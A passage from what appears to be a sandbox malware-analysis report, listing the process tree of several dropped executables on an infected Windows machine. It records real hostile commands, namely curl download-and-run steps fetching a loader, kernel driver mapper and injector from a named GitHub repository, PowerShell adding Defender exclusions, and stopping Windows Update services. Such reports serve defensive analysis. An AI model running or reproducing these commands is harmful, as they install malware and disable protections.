        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
        5⤵
        
        PID:5884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6096 /prefetch:8
        5⤵
        
        PID:792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4660 /prefetch:2
        5⤵
        
        PID:10220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:1
        5⤵
        
        PID:13084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
        5⤵
        
        PID:10588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
        5⤵
        
        PID:18976
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:4636
- - C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2512
- - C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe"
    3⤵
    - Executes dropped EXE
    PID:1260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo off
      4⤵
      PID:648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:2720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\mapper.exe
      4⤵
      PID:2388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\driver.sys
      4⤵
      PID:3900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareinj.exe
      4⤵
      PID:3832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\injectorold.exe
      4⤵
      PID:4940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareogfn.dll
      4⤵
      PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent > nul 2>&1
      4⤵
      PID:1444
    - - C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent
        5⤵
        
        PID:4392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:3916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\Temp\loader.exe
      4⤵
      PID:5412
    - - C:\Windows\Temp\loader.exe
        
        C:\Windows\Temp\loader.exe
        5⤵
        Executes dropped EXE
        
        PID:4136
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1
        6⤵
        
        PID:5952
        
        C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent
        7⤵
        
        PID:5604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&1
        6⤵
        
        PID:560
        
        C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent
        7⤵
        
        PID:872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1
        6⤵
        
        PID:6116
        
        C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent
        7⤵
        
        PID:3936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&1
        6⤵
        
        PID:6084
        
        C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent
        7⤵
        
        PID:5948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&1
        6⤵
        
        PID:5720
        
        C:\Windows\system32\curl.exe
        
        curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent
        7⤵
        
        PID:4392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:5916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:1400
- - C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3920
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1784
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:2644
- - C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5268
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      PID:2072
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5692
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:6080
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:6108
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4488
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3116
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3540
    - - C:\Users\Admin\AppData\Local\Temp\251081684.exe
        
        C:\Users\Admin\AppData\Local\Temp\251081684.exe
        5⤵
        
        PID:4484
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:6932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:7624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:6424
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:9300
    - - C:\Users\Admin\AppData\Local\Temp\192162186.exe
        
        C:\Users\Admin\AppData\Local\Temp\192162186.exe
        5⤵
        
        PID:8704
    - - C:\Users\Admin\AppData\Local\Temp\1541530299.exe
        
        C:\Users\Admin\AppData\Local\Temp\1541530299.exe
        5⤵
        
        PID:9312
    - - C:\Users\Admin\AppData\Local\Temp\1397623963.exe
        
        C:\Users\Admin\AppData\Local\Temp\1397623963.exe
        5⤵
        
        PID:10312
- - C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5928
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe"
    3⤵
    PID:3568
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:404
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4392
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:2484
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1000
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8084
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3420
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6192
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4612
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6580
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6684
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7128
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7072
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3392
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7720
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9964
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6712
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9912
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9532
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9576
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:3156
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10468
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10656
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11752
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12040
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11792
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12780
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13076
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14408
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13556
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14356
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15884
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:4840
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14184
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13384
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15784
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15000
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16780
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:18852
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20048
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20880
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20280
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:22428
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20620
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20620
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:23832
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:22168
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:17028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:21596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:18944
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11468
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6696
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16612
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:21924
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:5840
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:13660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12952
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14308
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14324
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14672
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:20352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16692
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:22352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7164
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:6408
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:11452
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7236
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9176
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10624
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:14936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:17532
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8580
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:23620
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:16092
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9344
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:24488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:8384
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:1708
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:10004
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:7056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:21044
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:336
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:22872
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:12756
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:9632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:15968
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe
      4⤵
      PID:21840
  - - C:\Windows\System32\cmd.exe
